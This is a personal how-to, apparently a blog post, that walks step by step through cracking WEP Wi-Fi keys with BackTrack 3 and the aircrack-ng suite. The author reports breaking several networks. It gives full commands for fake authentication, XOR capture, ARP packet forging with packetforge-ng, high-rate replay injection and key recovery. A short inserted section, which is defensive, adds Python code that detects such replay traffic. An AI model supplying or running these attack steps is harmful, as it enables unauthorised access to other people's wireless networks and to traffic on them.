20090114 note:
Now we don't need to boot bt3 to crack it: with aircrack-ng and the ipwraw module in Gentoo we can do everything the bt3 boot disk can.
Today, using some information found on Google, I successfully cracked several WEP wireless networks. Because the Google results were scattered, I wrote the process down by hand as I went, and I am recording it here so I don't forget it.
This process works for cracking WEP on APs both with and without connected clients.
Boot from a USB flash drive with bt3. bt3 is available here:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb
After downloading, put the contents on the USB flash drive, making sure the boot and bt3 directories sit in the root of the drive. Run bootinst.sh in the boot directory and press Enter to finish preparing the bt3 boot disk.
1. Boot bt3 and start KDE.
2. modprobe -r iwl3945
3. modprobe ipwraw
Note: the two steps above load the driver module for my Intel 3945ABG NIC. Step 2 unloads the original module and step 3 loads the new one.
If you do not have ipwraw in Gentoo, you can download it from:
wget http://homepages.tu-darmstadt.de/~p_larbig/WLAN/ipwraw-ng-2.3.4-04022008.tar.bz2
Unpack the archive, then run make && make install && make install_ucode, and load the module.
4. Use airoscript to view the available wireless networks.
airoscript cannot be typed at the command line; you have to find it in the menu (if you forget where, it is under the menu entry starting with B).
5. Open a new window and enter:
airodump-ng --ivs -w outputs -c 6 wifi0
Note: outputs is the filename prefix for the saved IV data, 6 is the channel of the target AP, and wifi0 is the device name of your NIC.
6. Open a new window and enter:
aireplay-ng -1 0 -e Essid -a apmac -h localmac wifi0
Here Essid is the ESSID of the target network, apmac is the MAC of the target AP, and localmac is the MAC of the local NIC, which is shown in step 4 or can be found with ifconfig, iwconfig and iwlist.
7. Generate an XOR file by sending attack packets to the target AP.
aireplay-ng -5 -b apmac -h localmac wifi0
Wait for the "Read ... packets" message. Sometimes it finds a usable packet after a few hundred, and sometimes it seems to keep reading for a long time without finding one...
When it asks "Use this packet?", enter y; a file with the .xor extension is then written to the current directory.
8. Prepare the attack packet
packetforge-ng -0 -a apmac -h localmac -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx.xor -w mrarp
Note: the first option is a zero (-0, meaning an ARP packet), -l is a lowercase L, and fragment-xxxx.xor is the file generated in step 7.
9. Send the attack packets
aireplay-ng -2 -r mrarp -x 1024 wifi0
1024 is the send rate; it is set so that the attack packets do not go out so fast that the AP falls over.
After this step you will see the #Data count for the target AP climbing rapidly in the airodump-ng window from step 5, which means the attack is working.
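From the defender's side, the replay in step 9 has a clear signature: a single station pushing on the order of a thousand identically sized data frames per second at one AP. The following is an added example, not from the original post, that flags such sources in constructed frame records; the MAC addresses, sample rates and thresholds are made up for illustration.

```python
from collections import Counter, defaultdict

# Constructed sample records: (timestamp_s, src_mac, bssid, frame_len).
# The legitimate station sends a handful of varied-size frames; the injecting
# station replays one ARP-sized frame about 1024 times per second, which is
# what makes the airodump-ng #Data counter jump in the write-up above.
LEGIT_STA = "00:11:22:33:44:55"
INJECTOR = "66:77:88:99:AA:BB"
TARGET_AP = "AA:BB:CC:DD:EE:01"
SAMPLE = (
    [(i * 0.2, LEGIT_STA, TARGET_AP, 60 + i % 7) for i in range(10)]
    + [(i / 1024, INJECTOR, TARGET_AP, 68) for i in range(1024)]
)


def find_replay_sources(records, rate_threshold=200, same_len_fraction=0.9):
    """Return {(src, bssid): frames_per_second} for stations whose data-frame
    rate towards an AP exceeds rate_threshold and whose frames are almost all
    the same length (a replayed packet never varies in size)."""
    by_pair = defaultdict(list)
    for ts, src, bssid, length in records:
        by_pair[(src, bssid)].append((ts, length))

    flagged = {}
    for pair, frames in by_pair.items():
        if len(frames) < 2:
            continue
        span = max(ts for ts, _ in frames) - min(ts for ts, _ in frames)
        rate = len(frames) / max(span, 1e-3)  # guard against zero span
        _, top_count = Counter(length for _, length in frames).most_common(1)[0]
        if rate >= rate_threshold and top_count / len(frames) >= same_len_fraction:
            flagged[pair] = round(rate)
    return flagged


if __name__ == "__main__":
    for (src, bssid), rate in find_replay_sources(SAMPLE).items():
        print(f"possible replay injection: {src} -> {bssid} at ~{rate} frames/s")
```

The same check can be run over real 802.11 capture metadata (source, BSSID, length, timestamp), which is all a wireless IDS needs to raise an alert on this kind of traffic.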
10. When the data count reaches about 30,000, open a new window and enter:
aircrack-ng -n 64 -b apmac outputs-01.ivs
Note: 64 means 64-bit encryption; for 128-bit, change it to 128. The .ivs file is the data file written by the airodump-ng command in step 5; its name is generally the prefix given there followed by a numeric suffix.
With a bit of luck, the key is displayed in hexadecimal!